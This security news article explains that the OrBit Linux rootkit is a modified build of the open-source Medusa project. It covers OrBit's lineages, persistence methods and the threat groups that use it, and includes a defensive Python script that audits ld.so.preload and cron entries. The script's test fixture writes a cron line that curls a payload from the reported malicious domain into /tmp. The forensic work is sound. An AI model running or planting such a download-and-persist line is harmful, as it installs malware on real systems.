The Linux malware known as OrBit, which has quietly compromised servers and stolen credentials for nearly four years, has turned out to be far from an original creation. Researchers from Intezer have determined that threat actors have spent years deploying a slightly modified build of Medusa, an open-source project published on GitHub in 2022. Over this period the malware has entered the arsenals of very different criminal groups, from ransomware operators to state-sponsored espionage campaigns.
When first documented in the summer of 2022, OrBit was described as a sophisticated Linux rootkit that hooks system libraries, hides processes, files, and network sockets, and intercepts credentials handled by SSH and sudo. Rather than beaconing to a command-and-control server, the operators accessed compromised hosts directly through an embedded SSH backdoor. The malware hid its own presence by manipulating more than forty Linux system calls.
A recent analysis of dozens of OrBit samples uploaded to VirusTotal between 2022 and 2026 revealed two main structural lineages. The first, designated Lineage A, carries the full feature set: credential harvesting, network activity hiding, log evasion, and traffic interception. Lineage B is a trimmed-down build, stripped of features such as PAM authentication interception, TCP port hiding, and network packet sniffing so as to reduce its footprint and visibility on the system.
Throughout its evolutionary cycle, operators routinely rotated hardcoded credentials, installation vectors, and string encryption keys. Certain iterations contained provocatively named directories like /lib/fuckwhitehatshome/, while others masqueraded as legitimate Linux system pathways.
In 2023, the developers introduced the xread function, which lets the malware bypass its own system call hooks so that utilities such as Git no longer break. Without this refinement, anomalies in network connections and file access could have betrayed the rootkit’s presence.
By 2025, OrBit received an ominous update, acquiring the ability to tamper with server-side PAM authentication via the pam_sm_authenticate routine. This mechanism empowered adversaries to not merely harvest credentials, but to autonomously authorize or obstruct system access.
At the same time, a new infection vector appeared. In place of the simple installer, operators deployed a two-stage downloader. The first stage infected ELF binaries and set up persistent cron jobs that fetched the second-stage payload from the domain cf0[.]pw. The second stage then installed the rootkit via ld.so.preload. This change gave OrBit its first full remote administration capability.
Security researchers further established a link between this new OrBit downloader and the RHOMBUS botnet, first observed in 2020. Both used the same framework and pulled payloads from the same command domain.
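The two persistence points described above (an ld.so.preload entry and a cron job fetching from the download domain) are exactly what a forensic review of a suspect host should look for. The following is an added example, not code from the report or from Intezer; it audits a filesystem mounted at `root` (for instance a disk image mounted read-only), because on a live, infected host the rootkit's userland hooks can hide the very files being inspected. The fixture directory, the library name `libplanted.so`, and the cron line are constructed for the demonstration; only the domain comes from the report.

```python
import re
import tempfile
from pathlib import Path

# Locations (relative to the mounted root) where persistence cron entries live.
CRON_PATHS = ["etc/crontab", "etc/cron.d", "var/spool/cron"]
# Second-stage download domain from the report (written cf0[.]pw there).
IOC_DOMAIN = "cf0.pw"


def preload_entries(root):
    """Return the library paths listed in <root>/etc/ld.so.preload (empty if absent)."""
    path = Path(root) / "etc" / "ld.so.preload"
    if not path.is_file():
        return []
    lines = path.read_text(errors="replace").splitlines()
    return [l.strip() for l in lines if l.strip() and not l.lstrip().startswith("#")]


def audit_preload(root, allowlist=()):
    """Flag every preload entry outside the allowlist as an (entry, reason) pair."""
    findings = []
    for entry in preload_entries(root):
        if entry in allowlist:
            continue
        on_disk = (Path(root) / entry.lstrip("/")).exists()
        findings.append((entry, "unexpected preload library" if on_disk
                         else "preload entry points to a missing file"))
    return findings


def audit_cron(root, domain=IOC_DOMAIN):
    """Return (file, line) pairs for cron entries that reference the IoC domain."""
    pattern = re.compile(re.escape(domain), re.IGNORECASE)
    hits = []
    for rel in CRON_PATHS:
        p = Path(root) / rel
        files = [p] if p.is_file() else ([f for f in p.rglob("*") if f.is_file()] if p.is_dir() else [])
        for f in files:
            for line in f.read_text(errors="replace").splitlines():
                if pattern.search(line):
                    hits.append((str(f.relative_to(root)), line.strip()))
    return hits


def build_sample_root():
    """Constructed fixture standing in for a mounted suspect filesystem (not a real sample)."""
    root = Path(tempfile.mkdtemp())
    (root / "etc" / "cron.d").mkdir(parents=True)
    (root / "usr" / "lib").mkdir(parents=True)
    (root / "usr" / "lib" / "libplanted.so").write_bytes(b"\x7fELF")  # constructed name
    (root / "etc" / "ld.so.preload").write_text("/usr/lib/libplanted.so\n")
    (root / "etc" / "cron.d" / "sysupdate").write_text(
        "*/10 * * * * root curl -s http://cf0.pw/CONSTRUCTED -o /tmp/.s\n")  # constructed line
    return str(root)


if __name__ == "__main__":
    sample = build_sample_root()
    print(audit_preload(sample), audit_cron(sample))
```

On a real system, populate the allowlist from entries you can tie to a package or a known deployment, and treat any remaining entry as a lead rather than a verdict.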
OrBit’s proliferation across prominent threat profiles has fueled intense analytical interest. Intelligence from CrowdStrike indicates that the BLOCKADE SPIDER syndicate deployed the malware to secure a stealthy foothold within VMware environments prior to unleashing Embargo ransomware. Concurrently, Mandiant reports document the identical toolkit being weaponized by the Chinese espionage nexus UNC3886 against Juniper and VMware infrastructures.
Ultimately, source-code analysis demonstrates that nearly all of OrBit’s “innovations” were natively present in the open-source Medusa project since its inception. The operators merely toggled desired modules during compilation. Investigators concluded that OrBit’s evolution closely mirrors the modular configuration of a pre-existing toolkit rather than organic malware development.
Intriguingly, the inaugural OrBit sample predated Medusa’s public GitHub release by several months. This anomaly suggests that the authors either possessed pre-release access to the codebase or that the software circulated within an exclusive, restricted cadre of operators long before its public debut.